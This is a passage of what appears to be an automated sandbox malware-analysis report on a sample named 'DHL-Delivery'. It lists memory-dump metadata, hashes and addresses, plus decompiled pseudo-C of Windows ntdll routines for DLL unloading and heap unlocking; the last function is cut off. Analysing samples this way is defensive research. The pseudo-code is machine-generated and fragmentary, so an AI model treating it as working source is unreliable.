                        0x1e152b38
                        0x1e1160ff
                        0x1e116104
                        0x1e116105
                        0x1e11610b
                        0x1e11610d
                        0x1e116110
                        0x1e116115
                        0x1e152771
                        0x1e152775
                        0x1e152777
                        0x1e15277d
                        0x1e116121
                        0x1e116121
                        0x1e11612a
                        0x1e116131
                        0x1e116132
                        0x1e11613b
                        0x1e1527f3
                        0x1e1527f6
                        0x1e1527ff
                        0x1e152800
                        0x1e152804
                        0x1e152807
                        0x1e15280a
                        0x1e15280c
                        0x1e152812
                        0x1e15281f
                        0x1e152888
                        0x1e15288d
                        0x1e152893
                        0x1e152896
                        0x1e152899
                        0x1e15289b
                        0x1e1528a3
                        0x1e1528d9
                        0x1e1528d9
                        0x1e116162
                        0x1e116166
                        0x1e1528e6
                        0x1e15294b
                        0x1e152951
                        0x1e152966
                        0x1e15296b
                        0x1e11624c
                        0x1e11624e
                        0x00000000
                        0x00000000
                        0x1e11625f
                        0x1e116261
                        0x1e116263
                        0x1e116266
                        0x00000000
                        0x00000000
                        0x1e11626c
                        0x1e116272
                        0x1e116275
                        0x00000000
                        0x1e116275
                        0x1e1528e8
                        0x1e1528ed
                        0x1e1528f0
                        0x1e1528f0
                        0x1e1528f6
                        0x00000000
                        0x00000000
                        0x1e1528fb
                        0x1e152912
                        0x1e152912
                        0x1e15291b
                        0x1e15291d
                        0x00000000
                        0x00000000
                        0x1e15291f
                        0x1e152925
                        0x1e15293e
                        0x1e152943
                        0x00000000
                        0x1e152943
                        0x1e1528fd
                        0x1e152901
                        0x1e152905
                        0x00000000
                        0x00000000
                        0x1e152907
                        0x1e15290a
                        0x1e152910
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e152910
                        0x1e152916
                        0x1e152918
                        0x00000000
                        0x1e152918
                        0x1e116173
                        0x00000000
                        0x1e116190
                        0x1e116194
                        0x1e152973
                        0x1e152976
                        0x1e15297b
                        0x1e15297f
                        0x1e1529a7
                        0x1e1529a9
                        0x1e1529ad
                        0x1e1529e0
                        0x1e1529e3
                        0x1e1529f1
                        0x1e1529f1
                        0x00000000
                        0x1e1529f1
                        0x1e1529e8
                        0x00000000
                        0x00000000
                        0x1e1529f0
                        0x00000000
                        0x1e1529f0
                        0x1e1529af
                        0x1e1529b5
                        0x1e1529b9
                        0x1e1529dd
                        0x1e1529df
                        0x00000000
                        0x1e1529df
                        0x1e1529bd
                        0x1e1529c1
                        0x00000000
                        0x00000000
                        0x1e1529c5
                        0x1e1529c9
                        0x00000000
                        0x00000000
                        0x1e1529cb
                        0x1e1529d0
                        0x1e1529d2
                        0x1e1529d3
                        0x00000000
                        0x1e1529d3
                        0x1e152981
                        0x1e15298c
                        0x00000000
                        0x1e1529a0
                        0x1e1529a0
                        0x00000000
                        0x1e1529a0
                        0x1e15298c
                        0x1e11619a
                        0x1e11619a
                        0x1e1161a0
                        0x1e1161a8
                        0x1e1161fb
                        0x1e1161fb
                        0x1e116202
                        0x1e116204
                        0x1e11620c
                        0x1e116212
                        0x1e11621a
                        0x1e152a28
                        0x1e152a5c
                        0x1e152a62
                        0x1e152a67
                        0x1e152a6a
                        0x1e152a2a
                        0x1e152a2a
                        0x1e152a36
                        0x1e152a3d
                        0x1e152a3f
                        0x1e152a47
                        0x1e152a4e
                        0x1e152a54
                        0x1e152a54
                        0x1e152a73
                        0x1e152a79
                        0x1e152a7f
                        0x1e152a82
                        0x1e152a88
                        0x1e152a91
                        0x1e152aa8
                        0x1e152aad
                        0x1e152ab5
                        0x1e152a93
                        0x1e152a93
                        0x1e152a95
                        0x1e152aa0
                        0x1e152aa0
                        0x1e152ac4
                        0x1e152acb
                        0x1e152acb
                        0x1e152a73
                        0x1e116227
                        0x1e116228
                        0x1e11622b
                        0x1e11622c
                        0x1e152adc
                        0x1e152afb
                        0x1e152b00
                        0x1e116232
                        0x1e116244
                        0x1e116249
                        0x1e116249
                        0x00000000
                        0x1e11622c
                        0x1e1161aa
                        0x1e1161b0
                        0x1e1161b6
                        0x1e1161ba
                        0x1e1161ba
                        0x1e1161bd
                        0x1e1161bf
                        0x1e1162c0
                        0x1e1529f9
                        0x1e1529f9
                        0x1e1529fc
                        0x1e1529fe
                        0x1e152a07
                        0x1e152a13
                        0x1e152a19
                        0x00000000
                        0x1e152a19
                        0x1e1162c6
                        0x1e1162c9
                        0x1e1162d1
                        0x1e1162d3
                        0x1e1161d6
                        0x1e1161d6
                        0x00000000
                        0x1e1161d6
                        0x1e1161c5
                        0x1e1161cd
                        0x1e1161d0
                        0x00000000
                        0x1e1161dd
                        0x1e1161dd
                        0x1e1161df
                        0x1e1161e5
                        0x1e1161e9
                        0x1e1161ef
                        0x1e1161f5
                        0x00000000
                        0x1e1161f5
                        0x1e116173
                        0x1e1528a5
                        0x1e1528b0
                        0x1e1528b9
                        0x1e1528c8
                        0x1e1528c8
                        0x1e1528cf
                        0x1e1528d7
                        0x1e1528aa
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e1528d7
                        0x00000000
                        0x1e1528b0
                        0x1e152821
                        0x1e152823
                        0x1e152831
                        0x1e152832
                        0x1e152838
                        0x1e152851
                        0x1e152857
                        0x1e15285a
                        0x1e152863
                        0x1e152865
                        0x1e152868
                        0x1e15286e
                        0x1e152874
                        0x1e152877
                        0x1e152880
                        0x00000000
                        0x00000000
                        0x1e152882
                        0x00000000
                        0x1e152882
                        0x1e15283a
                        0x1e152843
                        0x1e15284b
                        0x1e15284f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e15284f
                        0x00000000
                        0x1e152823
                        0x1e116141
                        0x1e116142
                        0x1e11614b
                        0x1e11614e
                        0x1e116153
                        0x1e116159
                        0x1e11615b
                        0x00000000
                        0x1e11615b
                        0x1e152786
                        0x1e15278c
                        0x1e152792
                        0x1e152794
                        0x1e152797
                        0x1e1527a0
                        0x00000000
                        0x1e1527b3
                        0x1e1527bc
                        0x1e1527c1
                        0x1e1527cc
                        0x1e1527cd
                        0x1e1527cf
                        0x1e1527d2
                        0x1e1527d7
                        0x00000000
                        0x00000000
                        0x1e1527df
                        0x1e1527e3
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e1527e3
                        0x1e1527a0
                        0x1e11611b
                        0x1e11611b
                        0x00000000
                        0x1e11611b
                        0x1e115fd8
                        0x1e115fe5
                        0x1e11607f
                        0x1e116085
                        0x1e116086
                        0x1e152c28
                        0x1e116099
                        0x1e116099
                        0x1e11609c
                        0x1e1160a2
                        0x1e1160a6
                        0x1e152c33
                        0x1e152c37
                        0x1e152c3d
                        0x00000000
                        0x1e152c3d
                        0x1e1160ac
                        0x1e1160af
                        0x1e1160b2
                        0x00000000
                        0x00000000
                        0x1e1160ba
                        0x1e1160bd
                        0x1e1160bf
                        0x1e1160c0
                        0x1e1160c4
                        0x1e1160c7
                        0x1e1160cd
                        0x1e1160d3
                        0x1e1160d9
                        0x00000000
                        0x1e1160d9
                        0x1e152c2e
                        0x1e11608f
                        0x00000000
                        0x00000000
                        0x1e116093
                        0x1e116097
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e115ff8
                        0x1e115ff8
                        0x1e115ff8
                        0x1e115ffb
                        0x1e115ffe
                        0x00000000
                        0x1e116004
                        0x1e11600b
                        0x1e116037
                        0x1e116039
                        0x1e116039
                        0x1e11600d
                        0x1e116010
                        0x1e116019
                        0x1e11601f
                        0x00000000
                        0x1e11601f
                        0x1e115ffe
                        0x1e115fe5
                        0x1e116045
                        0x00000000
                        0x00000000
                        0x1e11604d
                        0x1e116050
                        0x1e116058
                        0x1e116066
                        0x1e116066
                        0x1e116068
                        0x00000000
                        0x1e116068
                        0x1e115fb3
                        0x1e115f80
                        0x1e115f85
                        0x1e1526fa
                        0x1e1526fd
                        0x1e152700
                        0x1e152702
                        0x1e152705
                        0x1e15270b
                        0x1e15270e
                        0x1e152717
                        0x1e15271d
                        0x1e152720
                        0x1e152729
                        0x1e15272f
                        0x1e15272b
                        0x1e15272b
                        0x1e15272b
                        0x1e152732
                        0x1e152739
                        0x1e15273f
                        0x1e152741
                        0x1e152749
                        0x1e15274e
                        0x1e152750
                        0x1e152750
                        0x1e152749
                        0x1e152755
                        0x1e152764
                        0x00000000
                        0x1e152757
                        0x1e15275a
                        0x1e15275c
                        0x00000000
                        0x1e15275c
                        0x1e152755
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                        • API String ID: 0-360209818
                        • Opcode ID: 459bdb119674cfcc30b5b01c9248fada5efe467a4d0874530c652d5c665a474c
                        • Instruction ID: 4256d0ad84b96732f11a28928d4cf3f42864557c5286893be15bc506842c856c
                        • Opcode Fuzzy Hash: 459bdb119674cfcc30b5b01c9248fada5efe467a4d0874530c652d5c665a474c
                        • Instruction Fuzzy Hash: 1462B0B2A002298FDB24CF14C9507D9B7B2BF95710F6182EAE858AB384D7725ED1CF50
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 1E109F1C, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 178timeUNIQUE
                        Download Yara Rule
                        C-Code - Quality: 81%
                        			E1E109F1C(intOrPtr* __ecx, void* __edx) {
				char _v8;
				intOrPtr* _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t45;
				intOrPtr _t50;
				intOrPtr _t59;
				intOrPtr _t70;
				signed int _t71;
				signed int _t80;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t85;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t88;
				signed int _t89;
				signed int _t93;
				signed int _t99;
				intOrPtr* _t100;
				void* _t102;
				void* _t103;
				intOrPtr* _t104;
				signed int _t105;
				intOrPtr* _t106;
				void* _t108;
				intOrPtr* _t110;
				signed int _t112;
				signed int _t113;
				void* _t115;
				void* _t120;

				_t87 = __ecx;
				_t115 = (_t113 & 0xfffffff8) - 0x14;
				_t45 =  *[fs:0x30];
				_t110 = __ecx;
				_v16 = _t45;
				_t82 = 0;
				_v12 = __ecx;
				_push(_t103);
				if( *((intOrPtr*)(__ecx + 0x20)) == 0xfffffffc) {
					L3:
					 *(_t110 + 0x20) =  *(_t110 + 0x20) | 0xffffffff;
					E1E10ADE1(_t82, _t87, _t103, _t110,  *(_t110 + 0x20));
					L4:
					_t120 =  *0x1e1d14b0 - _t82; // 0x0
					if(_t120 != 0) {
						_t99 =  *0x7ffe0330;
						_t83 =  *0x1e1d4214; // 0x0
						_t88 = 0x20;
						_t87 = _t88 - (_t99 & 0x0000001f);
						asm("ror ebx, cl");
						_t82 = _t83 ^ _t99;
					}
					E1E0FFDF0(0x1e1ce2d8);
					_t50 =  *_t110;
					while(1) {
						_v20 = _t50;
						if(_t50 == _t110) {
							break;
						}
						_t20 = _t50 - 0x54; // -84
						_t104 = _t20;
						__eflags =  *(_t104 + 0x34) & 0x00000008;
						if(( *(_t104 + 0x34) & 0x00000008) != 0) {
							_push(_t87);
							_t102 = 2;
							E1E1024F4(_t104, _t102);
							__eflags = _t82;
							if(_t82 != 0) {
								 *0x1e1d41e0(_t104);
								 *_t82();
							}
							_t87 = _t104;
							E1E102561(_t87, 1);
							_t59 = _v24;
							__eflags =  *(_t59 + 0x68) & 0x00000100;
							if(( *(_t59 + 0x68) & 0x00000100) != 0) {
								_t87 = _t104;
								E1E165C8C(_t87);
							}
						}
						__eflags =  *0x1e1ce7b0 & 0x00000005;
						if(__eflags != 0) {
							_t44 = _t104 + 0x24; // -48
							E1E15BDA0("minkernel\\ntdll\\ldrsnap.c", 0xcd3, "LdrpUnloadNode", 2, "Unmapping DLL \"%wZ\"\n", _t44);
							_t115 = _t115 + 0x18;
						}
						_push(0);
						_push( *((intOrPtr*)(_t104 + 0x18)));
						E1E10ACB0(_t82, _t87, _t104, _t110, __eflags);
						_t50 =  *_v28;
					}
					_t45 = E1E0FFFF0(_t87, 0x1e1ce2d8);
					while(1) {
						L8:
						_t89 =  *(_t110 + 0x18);
						if(_t89 == 0) {
							break;
						}
						_t105 =  *_t89;
						__eflags = _t105 - _t89;
						if(_t105 == _t89) {
							 *(_t110 + 0x18) =  *(_t110 + 0x18) & 0x00000000;
						} else {
							_t45 =  *_t105;
							 *_t89 = _t45;
						}
						__eflags = _t105;
						if(_t105 == 0) {
							break;
						} else {
							E1E0EFBE0(_t45, 0x1e1d1528);
							_t86 =  *((intOrPtr*)(_t105 + 4));
							_t33 = _t105 + 8; // -76
							_t100 = _t33;
							_t93 =  *(_t86 + 0x1c);
							_t70 =  *_t93;
							_v20 = _t70;
							__eflags = _t70 - _t100;
							if(_t70 != _t100) {
								_t112 = _v16;
								do {
									_t71 =  *_t112;
									_t93 = _t112;
									_t112 = _t71;
									__eflags = _t71 - _t100;
								} while (_t71 != _t100);
								_t110 = _v12;
							}
							 *_t93 =  *_t100;
							__eflags =  *(_t86 + 0x1c) - _t100;
							if(__eflags == 0) {
								asm("sbb eax, eax");
								_t80 =  ~(_t93 - _t100) & _t93;
								__eflags = _t80;
								 *(_t86 + 0x1c) = _t80;
							}
							_push( &_v8);
							E1E0FB8FF(_t86, _t86, 0, _t105, _t110, __eflags);
							E1E0EFAC0(_t86, _t105, 0x1e1d1528);
							__eflags = _v16;
							if(_v16 != 0) {
								E1E109F1C(_t86, 0);
							}
							_t45 = E1E0F4EC0( *0x1e1d0c20, 0, _t105);
							continue;
						}
					}
					_t106 =  *_t110;
					 *(_t110 + 0x20) = 0xfffffffe;
					if(_t106 == _t110) {
						L14:
						return _t45;
					} else {
						goto L10;
					}
					do {
						L10:
						_t85 =  *_t106;
						_t108 = _t106 + 0xffffffac;
						 *(_t108 + 0x34) =  *(_t108 + 0x34) | 0x00000002;
						E1E0EFBE0(_t45, 0x1e1d1528);
						E1E10AC2D(_t108, _t110);
						if(( *(_t108 + 0x34) & 0x00000080) != 0) {
							_t16 = _t108 + 0x74; // -140
							L1E10A2F0(_t85, _t108, _t110, "\@u", _t16);
							_t17 = _t108 + 0x68; // -152
							L1E10A2F0(_t85, _t108, _t110, "(0u", _t17);
							 *(_t108 + 0x20) =  *(_t108 + 0x20) & 0x00000000;
						}
						E1E0EFAC0(_t85, _t108, 0x1e1d1528);
						if( *0x1e1d0c1c != 0) {
							E1E1167FD(_t108);
						}
						_t45 = E1E0FB42D(_t85, _t108, _t110);
						_t106 = _t85;
					} while (_t85 != _t110);
					goto L14;
				}
				if( *((intOrPtr*)(__ecx + 0x20)) == 7) {
					goto L4;
				}
				if( *((intOrPtr*)(__ecx + 0x20)) != 9) {
					goto L8;
				}
				goto L3;
			}








































                        0x1e109f1c
                        0x1e109f24
                        0x1e109f27
                        0x1e109f2f
                        0x1e109f31
                        0x1e109f35
                        0x1e109f37
                        0x1e109f3b
                        0x1e109f40
                        0x1e109f4e
                        0x1e109f4e
                        0x1e109f52
                        0x1e109f57
                        0x1e109f57
                        0x1e109f5d
                        0x1e10a0e6
                        0x1e10a0ee
                        0x1e10a0f9
                        0x1e10a0fa
                        0x1e10a0fc
                        0x1e10a0fe
                        0x1e10a0fe
                        0x1e109f68
                        0x1e109f6d
                        0x1e109f6f
                        0x1e109f6f
                        0x1e109f75
                        0x00000000
                        0x00000000
                        0x1e10a008
                        0x1e10a008
                        0x1e10a00b
                        0x1e10a00f
                        0x1e10a011
                        0x1e10a014
                        0x1e10a017
                        0x1e10a01c
                        0x1e10a01e
                        0x1e10a108
                        0x1e10a10e
                        0x1e10a10e
                        0x1e10a026
                        0x1e10a028
                        0x1e10a02d
                        0x1e10a031
                        0x1e10a038
                        0x1e14d641
                        0x1e14d643
                        0x1e14d643
                        0x1e10a038
                        0x1e10a03e
                        0x1e10a045
                        0x1e14d64d
                        0x1e14d667
                        0x1e14d66c
                        0x1e14d66c
                        0x1e10a04b
                        0x1e10a04d
                        0x1e10a050
                        0x1e10a059
                        0x1e10a059
                        0x1e109f80
                        0x1e109f85
                        0x1e109f85
                        0x1e109f85
                        0x1e109f8a
                        0x00000000
                        0x00000000
                        0x1e10a060
                        0x1e10a062
                        0x1e10a064
                        0x1e10a115
                        0x1e10a06a
                        0x1e10a06a
                        0x1e10a06c
                        0x1e10a06c
                        0x1e10a06e
                        0x1e10a070
                        0x00000000
                        0x1e10a076
                        0x1e10a07b
                        0x1e10a080
                        0x1e10a083
                        0x1e10a083
                        0x1e10a086
                        0x1e10a089
                        0x1e10a08b
                        0x1e10a08f
                        0x1e10a091
                        0x1e10a11e
                        0x1e10a122
                        0x1e10a122
                        0x1e10a124
                        0x1e10a126
                        0x1e10a128
                        0x1e10a128
                        0x1e10a12c
                        0x1e10a12c
                        0x1e10a099
                        0x1e10a09b
                        0x1e10a09e
                        0x1e10a0a6
                        0x1e10a0a8
                        0x1e10a0a8
                        0x1e10a0aa
                        0x1e10a0aa
                        0x1e10a0b3
                        0x1e10a0b6
                        0x1e10a0c0
                        0x1e10a0c5
                        0x1e10a0ca
                        0x1e10a0ce
                        0x1e10a0ce
                        0x1e10a0dc
                        0x00000000
                        0x1e10a0dc
                        0x1e10a070
                        0x1e109f90
                        0x1e109f92
                        0x1e109f9b
                        0x1e10a001
                        0x1e10a007
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e109f9d
                        0x1e109f9d
                        0x1e109f9d
                        0x1e109f9f
                        0x1e109fa7
                        0x1e109fab
                        0x1e109fb2
                        0x1e109fbb
                        0x1e109fbd
                        0x1e109fc6
                        0x1e109fcb
                        0x1e109fd4
                        0x1e109fd9
                        0x1e109fd9
                        0x1e109fe2
                        0x1e109fee
                        0x1e14d676
                        0x1e14d676
                        0x1e109ff6
                        0x1e109ffb
                        0x1e109ffd
                        0x00000000
                        0x1e109f9d
                        0x1e109f46
                        0x00000000
                        0x00000000
                        0x1e109f4c
                        0x00000000
                        0x00000000
                        0x00000000

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: (0u$LdrpUnloadNode$Unmapping DLL "%wZ"$\@u$minkernel\ntdll\ldrsnap.c
                        • API String ID: 3446177414-1134623788
                        • Opcode ID: 3e7c4e2f990ed449b21bfbafdaf302c9b4d4701f37f52298270a180da77b2f49
                        • Instruction ID: 2f5b8eba78e9f18e94f4e7bc555696b46609868b588d8dc45ff626ad390967f8
                        • Opcode Fuzzy Hash: 3e7c4e2f990ed449b21bfbafdaf302c9b4d4701f37f52298270a180da77b2f49
                        • Instruction Fuzzy Hash: 5D51F0767047829FC714DF24C994AAE77E2BBC4314F280B6DE5528B695DB30E9C4CB82
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 1E10EFD0, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 128timeUNIQUE
                        Download Yara Rule
                        C-Code - Quality: 44%
                        			E1E10EFD0(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int* _t38;
				signed int* _t39;
				char _t40;
				intOrPtr _t45;
				intOrPtr _t50;
				signed int _t57;
				signed int _t61;
				signed int _t67;
				intOrPtr _t79;
				signed char* _t80;
				intOrPtr _t84;
				intOrPtr _t86;
				intOrPtr* _t88;

				_push(__ecx);
				_push(__ecx);
				_t86 = _a4;
				if( *((intOrPtr*)(_t86 + 8)) == 0xddeeddee) {
					E1E1A3C9F(_t86, 0, __ecx);
					L6:
					_t38 =  *( *[fs:0x30] + 0x50);
					if(_t38 != 0) {
						__eflags =  *_t38;
						if( *_t38 == 0) {
							goto L7;
						}
						_t39 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
						L8:
						if( *_t39 != 0) {
							_t79 =  *[fs:0x30];
							__eflags =  *(_t79 + 0x240) & 0x00000001;
							if(( *(_t79 + 0x240) & 0x00000001) != 0) {
								E1E199B4F(_t86);
							}
						}
						_t40 = 1;
						L10:
						return _t40;
					}
					L7:
					_t39 = 0x7ffe0380;
					goto L8;
				}
				if(( *(_t86 + 0x44) & 0x01000000) != 0) {
					_t88 =  *0x1e1ce75c; // 0x0
					 *0x1e1d41e0(_t86);
					_t40 =  *_t88();
					goto L10;
				}
				if( *((intOrPtr*)(_t86 + 0x60)) != 0xeeffeeff) {
					_t45 =  *[fs:0x30];
					__eflags =  *(_t45 + 0xc);
					if( *(_t45 + 0xc) == 0) {
						_push("HEAP: ");
						E1E0DB1F0();
					} else {
						E1E0DB1F0("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E1E0DB1F0("Invalid heap signature for heap at %p", _t86);
					E1E0DB1F0(", passed to %s", "RtlUnlockHeap");
					_push("\n");
					E1E0DB1F0();
					_t50 =  *[fs:0x30];
					__eflags =  *((char*)(_t50 + 2));
					if( *((char*)(_t50 + 2)) != 0) {
						 *0x1e1cf3b8 = 1;
						asm("int3");
						 *0x1e1cf3b8 = 0;
					}
					_t40 = 0;
					goto L10;
				}
				if(( *(_t86 + 0x40) & 0x00000001) != 0) {
					goto L6;
				}
				_t84 =  *((intOrPtr*)(_t86 + 0xc8));
				 *((intOrPtr*)(_t86 + 0xe8)) =  *((intOrPtr*)(_t86 + 0xe8)) + 0xffff;
				_t13 = _t84 + 8;
				 *_t13 =  *((intOrPtr*)(_t84 + 8)) - 1;
				if( *_t13 != 0) {
					goto L6;
				}
				 *(_t84 + 0xc) =  *(_t84 + 0xc) & 0x00000000;
				_t80 = _t84 + 4;
				_t57 = 0xfffffffe;
				asm("lock cmpxchg [edx], ecx");
				_t67 = _t57;
				if(_t67 != 0xfffffffe) {
					__eflags =  *_t80 & 0x00000001;
					if(__eflags != 0) {
						_push(_t84);
						E1E177BF0(_t67, _t80, _t84, _t86, __eflags);
					}
					_t81 =  *(_t84 + 0x10);
					__eflags =  *(_t84 + 0x10);
					if( *(_t84 + 0x10) == 0) {
						_t81 = E1E11B32C(_t84, _t81);
					}
					while(1) {
						_v8 = _t67 & 0x00000002 | 0x00000001;
						_t61 = _t67;
						asm("lock cmpxchg [esi], ecx");
						__eflags = _t61 - _t67;
						if(_t61 == _t67) {
							break;
						}
						_t67 = _t61;
					}
					__eflags = _v8 & 0x00000002;
					_t86 = _a4;
					if((_v8 & 0x00000002) != 0) {
						E1E10204C(_t84, _t81);
					}
				}
				goto L6;
			}





















                        0x1e10efd5
                        0x1e10efd6
                        0x1e10efd9
                        0x1e10efe4
                        0x1e14ec82
                        0x1e10f03e
                        0x1e10f044
                        0x1e10f049
                        0x1e14ed72
                        0x1e14ed75
                        0x00000000
                        0x00000000
                        0x1e14ed84
                        0x1e10f054
                        0x1e10f057
                        0x1e14ed8e
                        0x1e14ed95
                        0x1e14ed9c
                        0x1e14eda4
                        0x1e14eda4
                        0x1e14ed9c
                        0x1e10f05d
                        0x1e10f05f
                        0x1e10f065
                        0x1e10f065
                        0x1e10f04f
                        0x1e10f04f
                        0x00000000
                        0x1e10f04f
                        0x1e10eff1
                        0x1e14ec8d
                        0x1e14ec95
                        0x1e14ec9b
                        0x00000000
                        0x1e14ec9b
                        0x1e10effe
                        0x1e14eca2
                        0x1e14eca8
                        0x1e14ecac
                        0x1e14eccb
                        0x1e14ecd0
                        0x1e14ecae
                        0x1e14ecc3
                        0x1e14ecc8
                        0x1e14ecdc
                        0x1e14eceb
                        0x1e14ecf0
                        0x1e14ecf5
                        0x1e14ecfa
                        0x1e14ed03
                        0x1e14ed07
                        0x1e14ed09
                        0x1e14ed10
                        0x1e14ed11
                        0x1e14ed11
                        0x1e14ed18
                        0x00000000
                        0x1e14ed18
                        0x1e10f008
                        0x00000000
                        0x00000000
                        0x1e10f00a
                        0x1e10f015
                        0x1e10f01c
                        0x1e10f01c
                        0x1e10f020
                        0x00000000
                        0x00000000
                        0x1e10f022
                        0x1e10f026
                        0x1e10f02e
                        0x1e10f02f
                        0x1e10f033
                        0x1e10f038
                        0x1e14ed1f
                        0x1e14ed22
                        0x1e14ed24
                        0x1e14ed25
                        0x1e14ed25
                        0x1e14ed2a
                        0x1e14ed2d
                        0x1e14ed2f
                        0x1e14ed38
                        0x1e14ed38
                        0x1e14ed3d
                        0x1e14ed45
                        0x1e14ed4b
                        0x1e14ed4d
                        0x1e14ed51
                        0x1e14ed53
                        0x00000000
                        0x00000000
                        0x1e14ed55
                        0x1e14ed55
                        0x1e14ed59
                        0x1e14ed5d
                        0x1e14ed60
                        0x1e14ed68
                        0x1e14ed68
                        0x1e14ed60
                        0x00000000

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                        • API String ID: 3446177414-3224558752
                        • Opcode ID: c0aae6d87779a548d2019ecb29380676b2591e828e8095ef25bf4a3737894f3f
                        • Instruction ID: 4768568fb939557338a9e5ebbd252424d1c90974d02bbe717472c1b97c336354
                        • Opcode Fuzzy Hash: c0aae6d87779a548d2019ecb29380676b2591e828e8095ef25bf4a3737894f3f
                        • Instruction Fuzzy Hash: 00416A39614781DFC312CB24C959B5AB7A6FF05720F208769F8168B785CB74B9C5C780
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 1E104EE0, Relevance: 9.6, APIs: 1, Strings: 4, Instructions: 893timeCOMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 80%
                        			E1E104EE0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t409;
				signed int _t413;
				void* _t420;
				signed int _t430;
				intOrPtr _t432;
				void* _t434;
				void* _t435;
				signed int _t436;
				void* _t439;
				unsigned int _t445;
				intOrPtr* _t465;
				intOrPtr* _t467;
				intOrPtr* _t469;
				intOrPtr* _t471;
				void* _t497;
				void* _t499;
				signed int _t505;
				void* _t509;
				void* _t512;
				intOrPtr _t513;
				void* _t514;
				void* _t517;
				char* _t524;
				intOrPtr _t535;
				intOrPtr _t544;
				void* _t547;
				void* _t548;
				signed int _t549;
				void* _t552;
				signed int _t554;
				void* _t555;
				signed int _t560;
				signed int _t561;
				intOrPtr _t583;
				void* _t592;
				void* _t593;
				unsigned int _t597;
				void* _t599;
				void* _t601;
				signed int _t606;
				intOrPtr _t607;
				void* _t610;
				void* _t611;
				intOrPtr _t623;
				signed int _t638;
				void* _t646;
				signed int _t651;
				signed int _t652;
				signed int _t662;
				void* _t666;
				signed int _t671;
				signed char _t672;
				signed int _t673;
				void* _t681;
				void* _t682;
				signed char _t683;
				signed char _t687;
				void* _t700;
				void* _t701;
				void* _t702;
				short _t703;
				void* _t704;
				signed int _t706;
				signed int _t707;
				void* _t720;
				void* _t722;
				signed int _t723;
				signed int _t724;
				void* _t726;
				intOrPtr* _t732;
				void* _t733;
				void* _t734;
				void* _t736;
				intOrPtr _t740;

				_push(0x114);
				_push(0x1e1b8dc0);
				E1E1343E0(__ebx, __edi, __esi);
				_t597 =  *(_t733 + 0x18);
				 *(_t733 - 0xb4) = _t597;
				_t671 =  *(_t733 + 8);
				 *(_t733 - 0xb0) = _t671;
				_t409 =  *(_t733 + 0xc);
				 *(_t733 - 0xb8) = _t409;
				 *(_t733 - 0xf4) = _t409;
				_t599 =  *(_t733 + 0x10);
				 *(_t733 - 0xd0) = _t599;
				_t720 =  *(_t733 + 0x14);
				 *(_t733 - 0xc4) = _t720;
				 *(_t733 - 0xe8) = _t597;
				_t700 =  *(_t733 + 0x1c);
				 *(_t733 - 0xd8) =  *( *[fs:0x30] + 0x68);
				 *(_t733 - 0xe4) = 0;
				 *(_t733 - 0xac) = 0;
				 *(_t733 - 0xbc) = 0;
				_t740 =  *0x1e1ce72c; // 0x0
				if(_t740 != 0) {
					__eflags =  *(_t733 - 0xb8);
					if( *(_t733 - 0xb8) != 0) {
						goto L1;
					}
					__eflags =  *(_t733 - 0xb4);
					if( *(_t733 - 0xb4) != 0) {
						goto L1;
					}
					_t732 =  *0x1e1ce744; // 0x0
					 *0x1e1d41e0(_t671, 0, _t599, _t720, 0, _t700);
					 *_t732();
					_t721 = 0;
					__eflags = 0;
					if(0 != 0) {
						L81:
						_t673 =  *(_t733 - 0xb4);
						L82:
						_t701 =  *(_t733 - 0xb8);
						_t413 = 0;
						L83:
						if(_t413 != 0) {
							__eflags = _t413 - _t673;
							if(__eflags != 0) {
								_push(_t413);
								E1E107450(0, _t701, _t721, __eflags);
							}
						}
						if( *(_t733 - 0xac) != 0) {
							__eflags = _t701;
